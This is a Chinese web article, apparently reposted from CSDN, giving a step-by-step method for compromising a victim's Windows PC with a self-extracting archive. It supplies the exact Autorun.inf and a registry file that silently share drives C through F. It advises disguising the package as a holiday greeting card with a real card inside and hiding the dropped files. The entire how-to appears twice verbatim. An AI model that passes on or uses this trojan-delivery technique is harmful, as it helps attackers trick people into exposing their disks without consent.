通過(guò)自解壓包來(lái)實(shí)現(xiàn)入侵
發(fā)布日期:2021-12-29 11:14 | 文章來(lái)源:CSDN
用自解壓包刪光別人的硬盤(pán),相信大家都會(huì)。我給大家介紹個(gè)用自解壓包入侵的方法。
如果捆綁一個(gè)木馬給別人,只要稍有常識(shí)的人有殺毒軟件就可以識(shí)破。如果不用木馬,用些批處理炸彈、碎片對(duì)象文件、或自導(dǎo)入注冊(cè)表文件,就可以實(shí)現(xiàn)各種攻擊。
把以下兩行保存為Autorun.inf
[Autorun]
open=regedit /s Autorun.reg
把以下一段保存為Autorun.reg
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$]
"Path"="c:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$]
"Path"="F:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
比如在當(dāng)今電子賀卡漫天飛的時(shí)代,可以把你的自解壓包命名為“猴年賀卡”,包里包個(gè)真賀卡,順便把以上兩個(gè)文件打包進(jìn)去,注意要指定文件解包路徑。當(dāng)收賀卡人點(diǎn)擊自解壓包時(shí)真賀卡被解壓的同時(shí),兩個(gè)文件就悄悄的被解到指定位置。Autorun.inf必須解到某一分區(qū)的根目錄,名字不能變,可以設(shè)置文件隱藏屬性。
Autorun.reg文件名和釋放目錄可以任意,可以更好的隱藏,注意Autorun.inf指向目錄正確的地方。
當(dāng)受害人雙擊有Autorun.inf的分區(qū)時(shí),他的硬盤(pán)C、D、E、F分區(qū)就被打開(kāi)公享。
如果捆綁一個(gè)木馬給別人,只要稍有常識(shí)的人有殺毒軟件就可以識(shí)破。如果不用木馬,用些批處理炸彈、碎片對(duì)象文件、或自導(dǎo)入注冊(cè)表文件,就可以實(shí)現(xiàn)各種攻擊。
把以下兩行保存為Autorun.inf
[Autorun]
open=regedit /s Autorun.reg
把以下一段保存為Autorun.reg
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$]
"Path"="c:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$]
"Path"="F:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
比如在當(dāng)今電子賀卡漫天飛的時(shí)代,可以把你的自解壓包命名為“猴年賀卡”,包里包個(gè)真賀卡,順便把以上兩個(gè)文件打包進(jìn)去,注意要指定文件解包路徑。當(dāng)收賀卡人點(diǎn)擊自解壓包時(shí)真賀卡被解壓的同時(shí),兩個(gè)文件就悄悄的被解到指定位置。Autorun.inf必須解到某一分區(qū)的根目錄,名字不能變,可以設(shè)置文件隱藏屬性。
Autorun.reg文件名和釋放目錄可以任意,可以更好的隱藏,注意Autorun.inf指向目錄正確的地方。
當(dāng)受害人雙擊有Autorun.inf的分區(qū)時(shí),他的硬盤(pán)C、D、E、F分區(qū)就被打開(kāi)公享。
版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
相關(guān)文章
關(guān)注官方微信